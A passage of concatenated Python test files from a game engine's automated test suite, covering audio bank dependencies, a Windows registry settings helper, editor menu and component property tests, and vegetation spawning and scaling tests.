'test_event_1_bank1_embedded_target', 'test_event_2_bank1_streamed_target', 'test_event_7_bank5_referenced_event_bank1_embedded', 'test_event_8_bank5_referenced_event_bank1_streamed' ] }, 'test_bank6.bnk': { 'dependencies': [bank_info.init_bank_path], 'events': [ 'test_event_3_bank2_embedded_target', 'test_event_4_bank2_streamed_target', 'test_event_9_bank6_referenced_event_bank2_embedded', 'test_event_10_bank6_referenced_event_bank2_streamed' ] }, } success_case_test(test_assets_folder, expected_dependencies, get_bank_info(workspace)) ``` #### File: PythonTests/automatedtesting_shared/windows_registry_setting.py ```python import pytest import logging from typing import List, Optional, Tuple, Any from winreg import ( CreateKey, OpenKey, QueryValueEx, DeleteValue, SetValueEx, KEY_ALL_ACCESS, KEY_WRITE, REG_SZ, REG_MULTI_SZ, REG_DWORD, HKEY_CURRENT_USER, ) from .platform_setting import PlatformSetting logger = logging.getLogger(__name__) class WindowsRegistrySetting(PlatformSetting): def __init__(self, workspace: pytest.fixture, subkey: str, key: str, hive: Optional[str] = None) -> None: super().__init__(workspace, subkey, key) self._hive = None try: if hive is not None: self._hive = self._str_to_hive(hive) except ValueError: logger.warning(f"Windows Registry Hive {hive} not recognized, using default: HKEY_CURRENT_USER") finally: if self._hive is None: self._hive = HKEY_CURRENT_USER def get_value(self, get_type: Optional[bool] = False) -> Any: """Retrieves the fast scan value in Windows registry (and optionally the type). If entry DNE, returns None.""" if self.entry_exists(): registryKey = OpenKey(self._hive, self._key) value = QueryValueEx(registryKey, self._subkey) registryKey.Close() # Convert windows data type to universal data type flag: PlatformSettings.DATA_TYPE # And handles unicode conversion for strings value = self._convert_value(value) return value if get_type else value[0] else: logger.warning(f"Could not retrieve Registry entry; key: {self._key}, subkey: {self._subkey}.") return None def set_value(self, value: Any) -> bool: """Sets the Windows registry value.""" value, win_type = self._format_data(value) registryKey = None result = False try: CreateKey(self._hive, self._subkey) registryKey = OpenKey(self._hive, self._key, 0, KEY_WRITE) SetValueEx(registryKey, self._subkey, 0, win_type, value) result = True except WindowsError as e: logger.warning(f"Windows error caught while setting fast scan registry: {e}") finally: if registryKey is not None: # Close key if it's been opened successfully registryKey.Close() return result def delete_entry(self) -> bool: """Deletes the Windows registry entry for fast scan enabled""" try: if self.entry_exists(): registryKey = OpenKey(self._hive, self._key, 0, KEY_ALL_ACCESS) DeleteValue(registryKey, self._subkey) registryKey.Close() return True except WindowsError: logger.error(f"Could not delete registry entry; key: {self._key}, subkey: {self._subkey}") finally: return False def entry_exists(self) -> bool: """Checks for existence of the setting in Windows registry.""" try: # Attempt to open and query key. If fails then the entry DNE registryKey = OpenKey(self._hive, self._key) QueryValueEx(registryKey, self._subkey) registryKey.Close() return True except WindowsError: return False @staticmethod def _format_data(value: bool or int or str or List[str]) -> Tuple[int or str or List[str], int]: """Formats the type of the value provided. Returns the formatted value and the windows registry type (int).""" if type(value) == str: return value, REG_SZ elif type(value) == bool: value = "true" if value else "false" return value, REG_SZ elif type(value) == int or type(value) == float: if type(value) == float: logger.warning(f"Windows registry does not support floats. Truncating {value} to integer") value = int(value) return value, REG_DWORD elif type(value) == list: for single_value in value: if type(single_value) != str: # fmt:off raise ValueError( f"Windows Registry lists only support strings, got a {type(single_value)} in the list") # fmt:on return value, REG_MULTI_SZ else: raise ValueError(f"Windows registry expected types: int, str and [str], found {type(value)}") @staticmethod def _convert_value(value_tuple: Tuple[Any, int]) -> Tuple[Any, PlatformSetting.DATA_TYPE]: """Converts the Windows registry data and type (tuple) to a (standardized) data and PlatformSetting.DATA_TYPE""" value, windows_type = value_tuple if windows_type == REG_SZ: # Convert from unicode to string return value, PlatformSetting.DATA_TYPE.STR elif windows_type == REG_MULTI_SZ: # Convert from unicode to string return [string for string in value], PlatformSetting.DATA_TYPE.STR_LIST elif windows_type == REG_DWORD: return value, PlatformSetting.DATA_TYPE.INT else: raise ValueError(f"Type flag not recognized: {windows_type}") @staticmethod def _str_to_hive(hive_str: str) -> int: """Converts a string to a Windows Registry Hive enum (int)""" from winreg import HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_LOCAL_MACHINE, HKEY_USERS lower = hive_str.lower() if lower == "hkey_current_user" or lower == "current_user": return HKEY_CURRENT_USER elif lower == "hkey_classes_root" or lower == "classes_root": return HKEY_CLASSES_ROOT elif lower == "hkey_current_config" or lower == "current_config": return HKEY_CURRENT_CONFIG elif lower == "hkey_local_machine" or lower == "local_machine": return HKEY_LOCAL_MACHINE elif lower == "hkey_users" or lower == "users": return HKEY_USERS else: raise ValueError(f"Hive: {hive_str} not recognized") ``` #### File: editor/EditorScripts/Menus_FileMenuOptions.py ```python import os import sys import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) from editor_python_test_tools.editor_test_helper import EditorTestHelper import editor_python_test_tools.pyside_utils as pyside_utils class TestFileMenuOptions(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="file_menu_options: ", args=["level"]) def run_test(self): """ Summary: Interact with File Menu options and verify if all the options are working. Expected Behavior: The File menu functions normally. Test Steps: 1) Open level 2) Interact with File Menu options Note: - This test file must be called from the Lumberyard Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ file_menu_options = [ ("New Level",), ("Open Level",), ("Import",), ("Save",), ("Save As",), ("Save Level Statistics",), ("Edit Project Settings",), ("Edit Platform Settings",), ("New Project",), ("Open Project",), ("Show Log File",), ("Resave All Slices",), ("Exit",), ] # 1) Open level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) def on_action_triggered(action_name): print(f"{action_name} Action triggered") # 2) Interact with File Menu options try: editor_window = pyside_utils.get_editor_main_window() for option in file_menu_options: action = pyside_utils.get_action_for_menu_path(editor_window, "File", *option) trig_func = lambda: on_action_triggered(action.iconText()) action.triggered.connect(trig_func) action.trigger() action.triggered.disconnect(trig_func) except Exception as e: self.test_success = False print(e) test = TestFileMenuOptions() test.run() ``` #### File: PythonTests/EditorPythonBindings/ComponentPropertyCommands_test.py ```python import pytest pytest.importorskip('ly_test_tools') import sys import os sys.path.append(os.path.dirname(__file__)) from hydra_utils import launch_test_case @pytest.mark.SUITE_sandbox @pytest.mark.parametrize('launcher_platform', ['windows_editor']) @pytest.mark.parametrize('project', ['AutomatedTesting']) @pytest.mark.parametrize('level', ['Simple']) class TestGradientRequiresShape(object): @pytest.mark.skip # SPEC-4102 def test_ComponentProperty(self, request, editor, level, launcher_platform): unexpected_lines=[] expected_lines = [ "New entity with no parent created", "Environment Probe component added to entity", "Entity has an Environment Probe component", "get_paths_list works", "GetSetCompareTest Settings|General Settings|Visible: SUCCESS", "GetSetCompareTest Settings|Animation|Style: SUCCESS", "GetSetCompareTest Settings|Environment Probe Settings|Box height: SUCCESS", "GetSetCompareTest Settings|General Settings|Color: SUCCESS", "GetSetCompareTest Settings|Environment Probe Settings|Area dimensions: SUCCESS", "PteTest Settings|General Settings|Visible: SUCCESS", "PteTest Settings|Animation|Style: SUCCESS", "PteTest Settings|Environment Probe Settings|Box height: SUCCESS", "PteTest Settings|General Settings|Color: SUCCESS", "PteTest Settings|Environment Probe Settings|Area dimensions: SUCCESS", ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_case.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # SPEC-4102 def test_SetDistance_Between_FilterBound_Mode(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "New entity with no parent created: SUCCESS", "Components added to entity: SUCCESS", "Found Vegetation Distance Between Filter: SUCCESS", "CompareComponentProperty - Configuration|Bound Mode: SUCCESS", "GetSetCompareTest - Configuration|Bound Mode: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_enum.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # LYN-1951 def test_PropertyTreeVisibility(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "oceanEntityId was found: SUCCESS", "Found Infinite Ocean component ID: SUCCESS", "Created a PropertyTreeEditor for the infiniteOceanId: SUCCESS", "Found proprety hidden node in path: SUCCESS", "Proprety node is now a hidden path: SUCCESS", "Property path enforcement of visibility: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_case_visibility.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # SPEC-4102 def test_PropertyContainerOpeartions(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "New entity with no parent created: SUCCESS", "GradientSurfaceDataComponent added to entity :SUCCESS", "Has zero items: SUCCESS", "Add an item 0: SUCCESS", "Has one item 0: SUCCESS", "Add an item 1: SUCCESS", "Add an item 2: SUCCESS", "Add an item 3: SUCCESS", "Has four items: SUCCESS", "Updated an item: SUCCESS", "itemTag equals tagFour: SUCCESS", "Removed one item 0: SUCCESS", "Removed one item 1: SUCCESS", "Has two items: SUCCESS", "Reset items: SUCCESS", "Has cleared the items: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_containers.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # LYN-1951 def test_PropertyContainerOpeartionWithNone(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "material current is valid - True: SUCCESS", "material set to None: SUCCESS", "material has been set to None: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_case_set_none.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) ``` #### File: PythonTests/EditorPythonBindings/PySide_Example_test_case.py ```python import sys import os import PySide2 sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../automatedtesting_shared') import azlmbr.bus as bus import azlmbr.entity as entity import azlmbr.editor as editor import azlmbr.legacy.general as general import editor_python_test_tools.pyside_component_utils as pysde_component_utils def PySide_Example_test_case(): # Open level, any level should work editor.EditorToolsApplicationRequestBus(bus.Broadcast, 'OpenLevelNoPrompt', os.path.join('WhiteBox', 'EmptyLevel')) entityId = editor.ToolsApplicationRequestBus(bus.Broadcast, 'CreateNewEntity', entity.EntityId()) if entityId: print('New entity with no parent created') # Get Component Type for Environment Probe and attach to entity typeIdsList = editor.EditorComponentAPIBus(bus.Broadcast, 'FindComponentTypeIdsByEntityType', ["Environment Probe"], entity.EntityType().Game) componentOutcome = editor.EditorComponentAPIBus(bus.Broadcast, 'AddComponentsOfType', entityId, typeIdsList) if componentOutcome.IsSuccess(): print('Environment Probe component added to entity') # Waiting for one frame so that the widgets in the UI are updated with the new component information general.idle_enable(True) general.idle_wait_frames(1) values = pyside_component_utils.get_component_combobox_values('Environment Probe', 'Resolution', print) if values: print(f'ComboBox Values retrieved: {values}.') else: print('Could not retrieve ComboBox values') editor.EditorToolsApplicationRequestBus(bus.Broadcast, 'ExitNoPrompt') if __name__ == '__main__': PySide_Example_test_case() ``` #### File: dyn_veg/EditorScripts/DistanceBetweenFilter_InstancesPlantAtSpecifiedRadius.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.editor as editor import azlmbr.legacy.general as general import azlmbr.bus as bus import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper from largeworlds.large_worlds_utils import editor_dynveg_test_helper as dynveg class TestDistanceBetweenFilterComponent(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="DistanceBetweenFilterComponent", args=["level"]) def run_test(self): """ Summary: Creates a level with a simple vegetation area. A Vegetation Distance Between Filter is added and the min radius is changed. Instance counts at specific points are validated. Test Steps: 1) Create a new level 2) Create a vegetation area 3) Create a surface for planting 4) Add the Vegetation System Settings component and setup for the test 5-8) Add the Distance Between Filter, and validate expected instance counts with a few different Radius values Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ instance_query_point_a = math.Vector3(512.5, 512.5, 32.0) instance_query_point_b = math.Vector3(514.0, 512.5, 32.0) instance_query_point_c = math.Vector3(515.0, 512.5, 32.0) # 1) Create a new, temporary level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) general.set_current_view_position(512.0, 480.0, 38.0) # 2) Create a new entity with required vegetation area components spawner_center_point = math.Vector3(520.0, 520.0, 32.0) asset_path = os.path.join("Slices", "1m_cube.dynamicslice") spawner_entity = dynveg.create_vegetation_area("Instance Spawner", spawner_center_point, 16.0, 16.0, 16.0, asset_path) # 3) Create a surface to plant on surface_center_point = math.Vector3(512.0, 512.0, 32.0) dynveg.create_surface_entity("Planting Surface", surface_center_point, 128.0, 128.0, 1.0) # 4) Add a Vegetation System Settings Level component and set Sector Point Snap Mode to Center veg_system_settings_component = hydra.add_level_component("Vegetation System Settings") editor.EditorComponentAPIBus(bus.Broadcast, "SetComponentProperty", veg_system_settings_component, 'Configuration|Area System Settings|Sector Point Snap Mode', 1) editor.EditorComponentAPIBus(bus.Broadcast, "SetComponentProperty", veg_system_settings_component, 'Configuration|Area System Settings|Sector Point Density', 16) # 5) Add a Vegetation Distance Between Filter and verify initial instance counts are accurate spawner_entity.add_component("Vegetation Distance Between Filter") num_expected = 16 * 16 num_expected = 16 * 16 initial_success = self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected), 5.0) self.test_success = self.test_success and initial_success # 6) Change Radius Min to 1.0, refresh, and verify instance counts are accurate spawner_entity.get_set_test(3, "Configuration|Radius Min", 1.0) point_a_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_a, 0.5, 1), 5.0) point_b_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_b, 0.5, 0), 5.0) point_c_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_c, 0.5, 1), 5.0) self.test_success = self.test_success and point_a_success and point_b_success and point_c_success # 7) Change Radius Min to 2.0, refresh, and verify instance counts are accurate spawner_entity.get_set_test(3, "Configuration|Radius Min", 2.0) point_a_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_a, 0.5, 1), 5.0) point_b_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_b, 0.5, 0), 5.0) point_c_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_c, 0.5, 0), 5.0) self.test_success = self.test_success and point_a_success and point_b_success and point_c_success # 8) Change Radius Min to 16.0, refresh, and verify instance counts are accurate spawner_entity.get_set_test(3, "Configuration|Radius Min", 16.0) num_expected_instances = 1 final_check_success = self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = final_check_success and self.test_success test = TestDistanceBetweenFilterComponent() test.run() ``` #### File: dyn_veg/EditorScripts/DynamicSliceInstanceSpawner_DynamicSliceSpawnerWorks.py ```python import os import sys import azlmbr.legacy.general as general import azlmbr.bus as bus import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper from largeworlds.large_worlds_utils import editor_dynveg_test_helper as dynveg class TestDynamicSliceInstanceSpawner(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="DynamicSliceInstanceSpawner", args=["level"]) def run_test(self): """ Summary: Test aspects of the DynamicSliceInstanceSpawner through the BehaviorContext and the Property Tree. :return: None """ # 1) Open an empty level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) general.idle_wait(1.0) general.set_current_view_position(512.0, 480.0, 38.0) # Grab the UUID that we need for creating an Dynamic Slice Instance Spawner dynamic_slice_spawner_uuid = azlmbr.math.Uuid_CreateString('{BBA5CC1E-B4CA-4792-89F7-93711E98FBD1}', 0) # Grab a path to a test dynamic slice asset test_slice_asset_path = os.path.join("Slices", "PinkFlower.dynamicslice") # 2) Test DynamicSliceInstanceSpawner BehaviorContext behavior_context_test_success = True dynamic_slice_spawner = azlmbr.vegetation.DynamicSliceInstanceSpawner() behavior_context_test_success = behavior_context_test_success and (dynamic_slice_spawner is not None) behavior_context_test_success = behavior_context_test_success and (dynamic_slice_spawner.typename == 'DynamicSliceInstanceSpawner') # Try to get/set the slice asset path with a valid asset dynamic_slice_spawner.SetSliceAssetPath(test_slice_asset_path) validate_path = dynamic_slice_spawner.GetSliceAssetPath() # We expect the path to get lowercased and normalized with a forward slash, so we compare our result # vs that instead of directly against test_slice_asset_path. behavior_context_test_success = behavior_context_test_success and hydra.compare_values('slices/pinkflower.dynamicslice', validate_path, 'GetSliceAssetPath - valid') # Try to get/set the slice asset path with an empty path dynamic_slice_spawner.SetSliceAssetPath('') validate_path = dynamic_slice_spawner.GetSliceAssetPath() behavior_context_test_success = behavior_context_test_success and hydra.compare_values('', validate_path, 'GetSliceAssetPath - empty') self.test_success = self.test_success and behavior_context_test_success self.log(f'DynamicSliceInstanceSpawner() BehaviorContext test: {behavior_context_test_success}') # 3) Test Descriptor BehaviorContext - setting spawnerType sets spawner too spawner_type_test_success = True descriptor = azlmbr.vegetation.Descriptor() spawner_type_test_success = spawner_type_test_success and hydra.get_set_property_test(descriptor, 'spawnerType', dynamic_slice_spawner_uuid) spawner_type_test_success = spawner_type_test_success and (descriptor.spawner.typename == 'DynamicSliceInstanceSpawner') self.test_success = self.test_success and spawner_type_test_success self.log(f'Descriptor() BehaviorContext spawnerType test: {spawner_type_test_success}') # 4) Test Descriptor BehaviorContext - setting spawner sets spawnerType too spawner_test_success = True descriptor = azlmbr.vegetation.Descriptor() descriptor.spawner = dynamic_slice_spawner spawner_test_success = spawner_test_success and (descriptor.spawnerType.Equal(dynamic_slice_spawner_uuid)) spawner_test_success = spawner_test_success and (descriptor.spawner.typename == 'DynamicSliceInstanceSpawner') self.test_success = self.test_success and spawner_test_success self.log(f'Descriptor() BehaviorContext spawner test: {spawner_test_success}') ### Setup for Property Tree set of tests # Create a new entity with required vegetation area components spawner_entity = hydra.Entity("Veg Area") spawner_entity.create_entity( math.Vector3(512.0, 512.0, 32.0), ["Vegetation Layer Spawner", "Box Shape", "Vegetation Asset List"] ) if (spawner_entity.id.IsValid()): self.log(f"'{spawner_entity.name}' created") # Resize the Box Shape component new_box_dimensions = math.Vector3(16.0, 16.0, 16.0) box_dimensions_path = "Box Shape|Box Configuration|Dimensions" spawner_entity.get_set_test(1, box_dimensions_path, new_box_dimensions) # Create a surface to plant on dynveg.create_surface_entity("Surface Entity", math.Vector3(512.0, 512.0, 32.0), 1024.0, 1024.0, 1.0) # 5) Descriptor Property Tree test: spawner type can be set # - Validate the dynamic slice spawner type can be set correctly. property_tree_success = True property_tree_success = property_tree_success and spawner_entity.get_set_test(2, 'Configuration|Embedded Assets|[0]|Instance Spawner', dynamic_slice_spawner_uuid) # This should result in 400 instances, since our box is 16 m x 16 m and by default the veg system plants # 20 instances per 16 meters spawner_entity.get_set_test(0, 'Configuration|Allow Empty Assets', True) num_expected_instances = 20 * 20 property_tree_success = property_tree_success and self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = self.test_success and property_tree_success self.log(f'Property Tree spawner type test: {property_tree_success}') # 6) Validate that the "Allow Empty Assets" setting affects the DynamicSliceInstanceSpawner allow_empty_assets_success = True # Since we have an empty slice path, we should have 0 instances once we disable 'Allow Empty Assets' num_expected_instances = 0 allow_empty_assets_success = allow_empty_assets_success and spawner_entity.get_set_test(0, 'Configuration|Allow Empty Assets', False) self.log('Allow Empty Assets test:') allow_empty_assets_success = allow_empty_assets_success and self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = self.test_success and allow_empty_assets_success self.log(f'Allow Empty Assets test: {allow_empty_assets_success}') # 7) Validate that with 'Allow Empty Assets' set to False, a non-empty slice asset gives us the number # of instances we expect. spawns_slices_success = True num_expected_instances = 20 * 20 dynamic_slice_spawner.SetSliceAssetPath(test_slice_asset_path) spawns_slices_success = spawns_slices_success and spawner_entity.get_set_test(0, 'Configuration|Allow Empty Assets', False) descriptor = hydra.get_component_property_value(spawner_entity.components[2], 'Configuration|Embedded Assets|[0]') descriptor.spawner = dynamic_slice_spawner spawns_slices_success = spawns_slices_success and spawner_entity.get_set_test(2, "Configuration|Embedded Assets|[0]", descriptor) self.log('Spawn dynamic slices test:') spawns_slices_success = spawns_slices_success and self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = self.test_success and spawns_slices_success self.log(f'Spawn dynamic slices test: {spawns_slices_success}') test = TestDynamicSliceInstanceSpawner() test.run() ``` #### File: dyn_veg/EditorScripts/MeshSurfaceTagEmitter_DependentOnMeshComponent.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.bus as bus import azlmbr.editor as editor import azlmbr.entity as EntityId import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper class TestMeshSurfaceTagEmitter(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="MeshSurfaceTagEmitter_DependentOnMeshComponent", args=["level"]) def run_test(self): """ Summary: A New level is loaded. A New entity is created with component "Mesh Surface Tag Emitter". Adding a component "Mesh" to the same entity. Expected Behavior: Mesh Surface Tag Emitter is disabled until the required Mesh component is added to the entity. Test Steps: 1) Open level 2) Create a new entity with component "Mesh Surface Tag Emitter" 3) Make sure Mesh Surface Tag Emitter is disabled 4) Add Mesh to the same entity 5) Make sure Mesh Surface Tag Emitter is enabled after adding Mesh Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ def is_component_enabled(EntityComponentIdPair): return editor.EditorComponentAPIBus(bus.Broadcast, "IsComponentEnabled", EntityComponentIdPair) # 1) Open level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) # 2) Create a new entity with component "Mesh Surface Tag Emitter" entity_position = math.Vector3(125.0, 136.0, 32.0) component_to_add = "Mesh Surface Tag Emitter" entity_id = editor.ToolsApplicationRequestBus( bus.Broadcast, "CreateNewEntityAtPosition", entity_position, EntityId.EntityId() ) meshentity = hydra.Entity("meshentity", entity_id) meshentity.components = [] meshentity.components.append(hydra.add_component(component_to_add, entity_id)) if entity_id.IsValid(): print("New Entity Created") # 3) Make sure Mesh Surface Tag Emitter is disabled is_enabled = is_component_enabled(meshentity.components[0]) self.test_success = self.test_success and not is_enabled if not is_enabled: print(f"{component_to_add} is Disabled") elif is_enabled: print(f"{component_to_add} is Enabled. But It should be disabled before adding Mesh") # 4) Add Mesh to the same entity component = "Mesh" meshentity.components.append(hydra.add_component(component, entity_id)) # 5) Make sure Mesh Surface Tag Emitter is enabled after adding Mesh is_enabled = is_component_enabled(meshentity.components[0]) self.test_success = self.test_success and is_enabled if is_enabled: print(f"{component_to_add} is Enabled") elif not is_enabled: print(f"{component_to_add} is Disabled. But It should be enabled after adding Mesh") test = TestMeshSurfaceTagEmitter() test.run() ``` #### File: dyn_veg/EditorScripts/ScaleModifierOverrides_InstancesProperlyScale.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.areasystem as areasystem import azlmbr.bus as bus import azlmbr.legacy.general as general import azlmbr.math as math sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper from largeworlds.large_worlds_utils import editor_dynveg_test_helper as dynveg # Constants CLOSE_ENOUGH_THRESHOLD = 0.01 class TestScaleModifierOverrides_InstancesProperlyScale(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="ScaleModifierOverrides_InstancesProperlyScale", args=["level"]) def run_test(self): """ Summary: A level is created, then as simple vegetation area is created. Vegetation Scale Modifier component is added to the vegetation area. A new child entity is created with Random Noise Gradient Generator, Gradient Transform Modifier, and Box Shape. Child entity is set as gradient entity id in Vegetation Scale Modifier, and scale of instances is validated to fall within expected range. Expected Behavior: Vegetation instances have random scale between Range Min and Range Max applied. Test Steps: 1) Create level 2) Create a new entity with components "Vegetation Layer Spawner", "Vegetation Asset List", "Box Shape" 3) Set a valid mesh asset on the Vegetation Asset List 4) Add Vegetation Scale Modifier component to the vegetation and set the values 5) Toggle on Scale Modifier Override and verify Scale Min and Scale Max are set 0.1 and 1.0 6) Create a new child entity and add components 7) Add child entity as gradient entity id in Vegetation Scale Modifier 8) Validate scale of instances with a few different min/max override values Note: - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ def set_and_validate_scale(entity, min_scale, max_scale): # Set Range Min/Max entity.get_set_test(2, "Configuration|Embedded Assets|[0]|Scale Modifier|Min", min_scale) entity.get_set_test(2, "Configuration|Embedded Assets|[0]|Scale Modifier|Max", max_scale) # Clear all areas to force a refresh general.run_console('veg_debugClearAllAreas') # Wait for instances to spawn num_expected = 20 * 20 self.test_success = self.test_success and self.wait_for_condition( lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected), 5.0) # Validate scale values of instances box = azlmbr.shape.ShapeComponentRequestsBus(bus.Event, 'GetEncompassingAabb', entity.id) instances = areasystem.AreaSystemRequestBus(bus.Broadcast, 'GetInstancesInAabb', box) if len(instances) == num_expected: for instance in instances: if min_scale <= instance.scale <= max_scale: self.log("All instances scaled within appropriate range") return True self.log(f"Instance at {instance.position} scale is {instance.scale}. Expected between " f"{min_scale}/{max_scale}") return False self.log(f"Failed to find all instances! Found {len(instances)}, expected {num_expected}.") return False # 1) Create level and set an appropriate view of spawner area self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) general.set_current_view_position(500.49, 498.69, 46.66) general.set_current_view_rotation(-42.05, 0.00, -36.33) # 2) Create a new entity with components "Vegetation Layer Spawner", "Vegetation Asset List", "Box Shape" entity_position = math.Vector3(512.0, 512.0, 32.0) asset_path = os.path.join("Slices", "PurpleFlower.dynamicslice") spawner_entity = dynveg.create_vegetation_area("Spawner Entity", entity_position, 16.0, 16.0, 10.0, asset_path) # Create a surface to plant on and add a Vegetation Debugger Level component to allow refreshes dynveg.create_surface_entity("Surface Entity", entity_position, 20.0, 20.0, 1.0) hydra.add_level_component("Vegetation Debugger") # 4) Add Vegetation Scale Modifier component to the vegetation and set the values spawner_entity.add_component("Vegetation Scale Modifier") spawner_entity.get_set_test(3, "Configuration|Allow Per-Item Overrides", True) # 5) Toggle on Scale Modifier Override and verify Scale Min and Scale Max are set 0.1 and 1.0 spawner_entity.get_set_test(2, "Configuration|Embedded Assets|[0]|Scale Modifier|Override Enabled", True) scale_min = float( format( ( hydra.get_component_property_value( spawner_entity.components[2], "Configuration|Embedded Assets|[0]|Scale Modifier|Min" ) ), ".1f", ) ) scale_max = float( format( ( hydra.get_component_property_value( spawner_entity.components[2], "Configuration|Embedded Assets|[0]|Scale Modifier|Max" ) ), ".1f", ) ) if ((scale_max - 1.0) < CLOSE_ENOUGH_THRESHOLD) and ((scale_min - 0.1) < CLOSE_ENOUGH_THRESHOLD): self.log("Scale Min and Scale Max are set to 0.1 and 1.0 in Vegetation Asset List") else: self.log("Scale Min and Scale Max are not set to 0.1 and 1.0 in Vegetation Asset List") # 6) Create a new child entity and add components gradient_entity = hydra.Entity("Gradient Entity") gradient_entity.create_entity( entity_position, ["Random Noise Gradient", "Gradient Transform Modifier", "Box Shape"], parent_id=spawner_entity.id ) if gradient_entity.id.IsValid(): self.log(f"'{gradient_entity.name}' created") # 7) Add child entity as gradient entity id in Vegetation Scale Modifier spawner_entity.get_set_test(3, "Configuration|Gradient|Gradient Entity Id", gradient_entity.id) # 8) Validate instances are scaled properly via a few different Range Min/Max settings on the override self.test_success = set_and_validate_scale(spawner_entity, 0.1, 1.0) and self.test_success self.test_success = set_and_validate_scale(spawner_entity, 2.0, 2.5) and self.test_success self.test_success = set_and_validate_scale(spawner_entity, 1.0, 5.0) and self.test_success test = TestScaleModifierOverrides_InstancesProperlyScale() test.run() ``` #### File: gradient_signal/EditorScripts/GradientTransform_FrequencyZoomCanBeSetBeyondSliderRange.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.bus as bus import azlmbr.editor as editor import azlmbr.math as math import azlmbr.paths import azlmbr.entity as EntityId sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper class TestGradientTransformFrequencyZoom(EditorTestHelper): def __init__(self): 